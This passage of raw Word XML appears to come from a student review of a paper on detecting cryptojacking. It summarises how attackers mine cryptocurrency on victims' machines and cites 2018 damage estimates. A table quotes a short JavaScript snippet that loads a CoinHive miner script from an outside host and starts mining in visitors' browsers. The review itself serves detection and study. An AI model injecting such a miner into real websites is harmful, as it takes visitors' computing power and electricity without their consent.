        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AA44F9" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>runs on P2P network and doesn’t require any central organization to control it), introducing these 2 concepts will make up the solution for</w:t>
      </w:r>
      <w:r w:rsidR="002A2902" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> detecting</w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Cryptojacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to the write</w:t>
      </w:r>
      <w:r w:rsidR="002A2902" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>r,</w:t>
      </w:r>
      <w:r w:rsidR="000E38BE" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a Naïve Model with simple functions to resolve this issue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D23788" w14:textId="77777777" w:rsidR="00C829DC" w:rsidRPr="00C829DC" w:rsidRDefault="00C829DC" w:rsidP="00205FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C183D7" w14:textId="31BB4D61" w:rsidR="00205FE3" w:rsidRPr="00C829DC" w:rsidRDefault="00205FE3" w:rsidP="00205FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Problem Statement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D8941" w14:textId="63ECD367" w:rsidR="00205FE3" w:rsidRPr="00C829DC" w:rsidRDefault="009E5CB4" w:rsidP="00205FE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">The paper discuss one of the recent growing threats in mining world where there is a new term that appeared in the recent years which is called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Cryptojacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is identified to using victims computer resources in mining without </w:t>
      </w:r>
      <w:r w:rsidR="002037EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> approval or knowledge for free and it has many types like installing a malware software on the victim machine and preform mining on the host machine and there is another type that </w:t>
      </w:r>
      <w:r w:rsidR="00EB672D" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">rely on injecting some script code in the </w:t>
      </w:r>
      <w:r w:rsidR="002037EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00EB672D" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> code of the website </w:t>
      </w:r>
      <w:r w:rsidR="002037EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00EB672D" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>whether it was injected by the web administrator or attacker</w:t>
      </w:r>
      <w:r w:rsidR="002037EF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00EB672D" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> to utilize some of the computer resources of the victim and then this script is executed on the victim computer to preform mining and get Ethereum for free </w:t>
      </w:r>
      <w:r w:rsidR="00383295" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">and the writer </w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">proposed some sample </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> code that can preform mining on the victim machine using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>coinhive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (online service providing crypto mining malware) where the code is as follows:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00627F3A" w:rsidRPr="00C829DC" w14:paraId="21237392" w14:textId="77777777" w:rsidTr="00627F3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DD92922" w14:textId="77777777" w:rsidR="00627F3A" w:rsidRPr="00C829DC" w:rsidRDefault="00627F3A" w:rsidP="00627F3A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>scr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="00C829DC">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                  <w:lang w:bidi="ar-EG"/>
                </w:rPr>
                <w:t>https://coinhive.com/lib/coinhive.min.js</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&gt;&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CE8837" w14:textId="77777777" w:rsidR="00627F3A" w:rsidRPr="00C829DC" w:rsidRDefault="00627F3A" w:rsidP="00627F3A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C84AB57" w14:textId="7C1EFAF1" w:rsidR="00627F3A" w:rsidRPr="00C829DC" w:rsidRDefault="00627F3A" w:rsidP="00627F3A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">      var miner = new </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>CoinHive.User</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>(‘SITE_KEY’, ‘username’</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4B8DEC28" w14:textId="6E6A521D" w:rsidR="00627F3A" w:rsidRPr="00C829DC" w:rsidRDefault="00627F3A" w:rsidP="00627F3A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>miner.start</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DBDB05B" w14:textId="28ADF316" w:rsidR="00627F3A" w:rsidRPr="00C829DC" w:rsidRDefault="00627F3A" w:rsidP="00627F3A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="4472C4" w:themeColor="accent1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r w:rsidRPr="00C829DC">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16F98B62" w14:textId="56373B68" w:rsidR="00627F3A" w:rsidRDefault="000645AB" w:rsidP="000645AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">But note that there are so many ways to preform web mining where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>CoinHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> is only one of the, </w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>And the writer then discussed that in the 1</w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> half of 2018 about 47 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>cryptomining</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> malicious software were detected and that number is more than double the number in the 2</w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00627F3A" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> half of 2017 where damage caused by these has been estimated where the extra-power per day exceeded 278 000 kW and attacker can earn at least about US$59 000 per day due these malicious software</w:t>
      </w:r>
      <w:r w:rsidR="004B7FF4" w:rsidRPr="00C829DC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. the write</w:t>
      </w:r>
      <w:r w:rsidR="002037EF">
        <w:rPr>
